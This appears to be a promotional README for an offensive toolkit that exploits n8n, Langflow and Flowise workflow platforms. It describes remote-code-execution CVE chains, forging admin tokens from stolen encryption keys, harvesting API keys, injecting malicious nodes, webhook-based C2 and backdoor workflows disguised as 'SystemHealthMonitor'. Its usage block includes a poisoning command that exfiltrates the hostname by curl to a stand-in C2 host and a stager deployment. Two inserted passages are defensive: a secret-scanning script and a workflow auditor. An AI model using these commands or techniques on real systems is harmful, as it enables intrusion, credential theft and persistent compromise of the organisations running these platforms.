SPECTER FLOW is the first offensive security tool targeting AI workflow automation platforms. Three CISA-flagged, actively-exploited CVEs anchor the toolkit: CVE-2026-21858 Ni8mare (CVSS 10.0) enables unauthenticated RCE on n8n via webhook content-type confusion; CVE-2026-33017 (CVSS 9.3) delivers unauthenticated RCE on Langflow exploited within 20 hours of disclosure; CVE-2025-59528 (Max severity) enables unauthenticated JS injection to RCE on 15,000+ exposed Flowise instances. SESSION-FORGE extracts admin tokens from file read primitives. WORKFLOW-POISON injects persistent malicious nodes. WEAPONIZE converts legitimate webhooks into C2 channels — 686% abuse increase documented by Cisco Talos. 249 tests. Zero failures.
Eight subsystems. Full workflow platform exploitation pipeline.
SURVEY: HTTP fingerprinting of n8n, Langflow, and Flowise instances. Platform version detection via endpoint signatures. Unauthenticated endpoint enumeration. CVE applicability mapping. Webhook inventory via /rest/workflows scan.
WEBHOOK-RCE: CVE-2026-21858 "Ni8mare": multipart boundary confusion smuggles a path traversal in the filename field, triggering arbitrary file read on n8n. CVE-2026-33017: unauthenticated /api/v1/run on Langflow. CVE-2025-34291: /validate/code exec. CVE-2025-59528: Flowise prediction endpoint JS injection.
SESSION-FORGE: Stage 2 of CVE-2026-21858: the file read retrieves ~/.n8n/config, extracts the encryptionKey, and forges an HMAC-signed admin token. Langflow default superuser credential test. CVE-2025-34291 CORS+CSRF token harvest via /whoami. Flowise unauthenticated /api/v1/apikey harvest.
CREDENTIAL-HARVEST: Systematic extraction of API keys from workflow configurations. Scans /rest/credentials, /rest/workflows, /api/v1/flows/, /api/v1/variables, /api/v1/chatflows. Regex detection for OpenAI, Anthropic, AWS, GitHub, Slack, GitLab, generic secrets, and Bearer tokens.
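Secrets pasted directly into node parameters are what this kind of regex pass finds, so the same check is worth running over your own workflow exports first. The following is an added example, not SPECTER FLOW's code: the patterns are common prefix-based scanner rules chosen here as an assumption, and the sample export is constructed.

```python
import re

# Prefix-based patterns in common use by secret scanners.
# Assumption: illustrative rules, not the regexes the tool itself ships.
PATTERNS = [
    ("anthropic", re.compile(r"\bsk-ant-[A-Za-z0-9_-]{20,}")),
    ("openai", re.compile(r"\bsk-(?!ant-)[A-Za-z0-9_-]{20,}")),
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("github_pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    ("gitlab_pat", re.compile(r"\bglpat-[A-Za-z0-9_-]{20,}")),
    ("slack_token", re.compile(r"\bxox[abprs]-[A-Za-z0-9-]{10,}")),
    ("bearer", re.compile(r"\bBearer\s+[A-Za-z0-9._~+/-]{20,}")),
]

def redact(value):
    """Keep only a short prefix and the length so the report never holds the secret."""
    return f"{value[:6]}... ({len(value)} chars)"

def scan(obj, path="$"):
    """Walk parsed workflow JSON; yield (json_path, kind, redacted_match) per hit."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from scan(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from scan(value, f"{path}[{i}]")
    elif isinstance(obj, str):
        for kind, rx in PATTERNS:
            for m in rx.finditer(obj):
                yield path, kind, redact(m.group(0))

# Constructed sample export: one header token and one key left in a note field.
# The second node also carries a credential reference, which holds no secret.
SAMPLE_EXPORT = {"name": "nightly-sync", "nodes": [
    {"name": "Call API", "type": "n8n-nodes-base.httpRequest",
     "parameters": {"headerParameters": {"parameters": [
         {"name": "Authorization", "value": "Bearer " + "eyJ" + "a" * 40}]}}},
    {"name": "S3", "type": "n8n-nodes-base.awsS3",
     "parameters": {"note": "key AKIAIOSFODNN7EXAMPLE"},
     "credentials": {"aws": {"id": "7", "name": "prod-aws"}}},
]}
```

Each hit carries the JSON path of the offending field, which is the node parameter to move into the platform's credential store and the key to rotate.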
WORKFLOW-POISON: Injects malicious Execute Command nodes into existing n8n workflows. Appends custom Python components to Langflow flows. Embeds setInterval-triggered execSync nodes in Flowise chatflows. Optional C2 exfil node chained to poison node output.
WEAPONIZE: deploy new n8n workflow with webhook trigger that dynamically serves malware payloads based on User-Agent. Hijack existing webhooks. Flowise prediction endpoint as C2 relay. PERSIST: schedule cron-triggered RCE workflows disguised as "SystemHealthMonitor". Flowise setInterval backdoor node.
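On the defensive side, the poisoned and persistent n8n workflows described above have a shape that shows up in an exported workflow: a webhook or schedule trigger that can reach an Execute Command node. The following is an added detection example, not part of SPECTER FLOW or the original page; it assumes n8n's exported workflow layout (`nodes` plus a `connections` map) and n8n's built-in node type names, and both sample workflows are constructed.

```python
# Node type identifiers from n8n's built-in node set.
EXEC_TYPES = {"n8n-nodes-base.executeCommand"}
TRIGGERS = {
    "n8n-nodes-base.webhook": "webhook",
    "n8n-nodes-base.cron": "schedule",
    "n8n-nodes-base.scheduleTrigger": "schedule",
}

def downstream(connections, start):
    """Names of all nodes reachable from `start` through the connections map."""
    seen, stack = set(), [start]
    while stack:
        for outputs in connections.get(stack.pop(), {}).values():
            for branch in outputs:
                for link in branch or []:      # tolerate null/empty output branches
                    if link["node"] not in seen:
                        seen.add(link["node"])
                        stack.append(link["node"])
    return seen

def audit_workflow(wf):
    """Findings for every trigger that can reach a command-execution node."""
    by_name = {n["name"]: n for n in wf.get("nodes", [])}
    findings = []
    for name, node in by_name.items():
        kind = TRIGGERS.get(node.get("type"))
        if kind is None:
            continue
        for target in sorted(downstream(wf.get("connections", {}), name)):
            hit = by_name.get(target, {})
            if hit.get("type") in EXEC_TYPES:
                findings.append((wf.get("name"), kind, target,
                                 hit.get("parameters", {}).get("command")))
    return findings

# Constructed sample exports (not real data).
SUSPECT = {"name": "SystemHealthMonitor", "nodes": [
    {"name": "Every 5m", "type": "n8n-nodes-base.scheduleTrigger", "parameters": {}},
    {"name": "Format", "type": "n8n-nodes-base.set", "parameters": {}},
    {"name": "Check", "type": "n8n-nodes-base.executeCommand", "parameters": {"command": "id"}}],
  "connections": {
    "Every 5m": {"main": [[{"node": "Format", "type": "main", "index": 0}]]},
    "Format": {"main": [[{"node": "Check", "type": "main", "index": 0}], None]}}}
BENIGN = {"name": "lead-intake", "nodes": [
    {"name": "Hook", "type": "n8n-nodes-base.webhook", "parameters": {}},
    {"name": "CRM", "type": "n8n-nodes-base.httpRequest", "parameters": {}}],
  "connections": {"Hook": {"main": [[{"node": "CRM", "type": "main", "index": 0}]]}}}
```

Run it over every exported workflow and diff the findings against a reviewed baseline; a new trigger-to-command path, or a workflow nobody on the team created, is the signal to investigate.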
| Subsystem | Gate | Function |
|---|---|---|
| SURVEY | OPEN | Platform fingerprinting, endpoint enumeration, CVE applicability, webhook inventory |
| WEBHOOK-RCE | INJECT | CVE-2026-21858 (n8n), CVE-2026-33017 + CVE-2025-34291 (Langflow), CVE-2025-59528 (Flowise) |
| SESSION-FORGE | INJECT | Encryption key extraction, admin token forge, default creds, CSRF token harvest |
| CREDENTIAL-HARVEST | INJECT | API key extraction from workflow configs, credentials store, variables endpoints |
| WORKFLOW-POISON | UNLEASHED | Malicious node injection into existing workflows across all three platforms |
| WEAPONIZE | UNLEASHED | Webhook-based C2 deployment, payload delivery, legitimate-platform relay |
| PERSIST | UNLEASHED | Scheduled backdoor workflows, cron-triggered RCE, setInterval persistence nodes |
| REPORT | OPEN | Ed25519-signed SFL-{hex12} HTML+JSON reports, auto-generated findings |
```bash
# Install
pip install -e /path/to/red-specter-specter-flow

# Survey — fingerprint platform and enumerate attack surface
specter-flow survey http://n8n.target.internal:5678

# Exploit CVE-2026-21858 Ni8mare for file read / RCE (INJECT gate)
specter-flow webhook-rce http://n8n.target.internal:5678 \
    --platform n8n \
    --command "id" \
    --override INJECT

# Forge admin session from encrypted config (INJECT gate)
specter-flow session-forge http://n8n.target.internal:5678 \
    --platform n8n \
    --override INJECT

# Harvest API keys from workflow configurations (INJECT gate)
specter-flow credential-harvest http://n8n.target.internal:5678 \
    --platform n8n \
    --token <forged-token> \
    --override INJECT

# Poison workflows with malicious nodes (UNLEASHED gate)
specter-flow workflow-poison http://n8n.target.internal:5678 \
    --platform n8n \
    --command "curl http://c2.example.com/$(hostname | base64)" \
    --override UNLEASHED \
    --confirm-workflow-manipulation \
    --roe-file roe.txt

# Deploy C2 webhook channel (UNLEASHED gate)
specter-flow weaponize http://n8n.target.internal:5678 \
    --platform n8n \
    --payload stager \
    --c2 https://c2.callback.example.com \
    --override UNLEASHED \
    --confirm-workflow-manipulation \
    --roe-file roe.txt

# Generate signed SFL report
specter-flow report http://n8n.target.internal:5678 --output /tmp/
```
| CVE | CVSS | Platform | Technique |
|---|---|---|---|
| CVE-2026-21858 "Ni8mare" | 10.0 | n8n | Webhook content-type confusion → arbitrary file read → admin session forge → unauthenticated RCE |
| CVE-2026-21877 | 9.x | n8n | Secondary n8n RCE chain |
| CVE-2026-27493 | 9.x | n8n | n8n RCE chain (CVSS 9.x) |
| CVE-2026-33017 | 9.3 | Langflow | Unauthenticated RCE via /api/v1/run; CISA advisory; exploited <20h post-disclosure |
| CVE-2025-34291 | 9.4 | Langflow | CORS misconfig + missing CSRF + unsafe /validate/code exec → full account takeover |
| CVE-2025-59528 | Max | Flowise | Unauthenticated JS injection → RCE; 15,000+ instances exposed |
| Gate | Flag | Capability |
|---|---|---|
| OPEN | (default) | SURVEY, REPORT — passive fingerprinting and reporting |
| INJECT | --override INJECT | OPEN + WEBHOOK-RCE, SESSION-FORGE, CREDENTIAL-HARVEST |
| UNLEASHED | --override UNLEASHED --confirm-workflow-manipulation --roe-file roe.txt | INJECT + WORKFLOW-POISON, WEAPONIZE, PERSIST — ROE file must contain "workflow manipulation authorised" |
| Source | Finding |
|---|---|
| Horizon3.ai (2026) | CVE-2026-21858 "Ni8mare" — CVSS 10.0 n8n RCE; 100,000+ instances exposed globally |
| CISA Advisory (2026) | CVE-2026-33017 Langflow RCE actively exploited in wild; unpatched instances remain vulnerable |
| Cisco Talos (May 2026) | 686% increase in n8n webhook abuse for malware delivery; legitimate cloud IPs bypass reputation filters |
| BleepingComputer (2025) | CVE-2025-59528 Flowise Max-severity RCE actively exploited; 15,000 instances exposed on internet |
workflow_rce_chain ai_pipeline_credential_exfil webhook_c2_deployment persistent_workflow_backdoor enterprise_automation_destruction
All reports are signed with the operator's Ed25519 private key at ~/.specter_flow/operator.key. Report IDs follow the format SFL-{12 hex chars}. Reports include all subsystem results, CVE evidence, credential findings, and Ed25519 signature. Delivered as both JSON and HTML.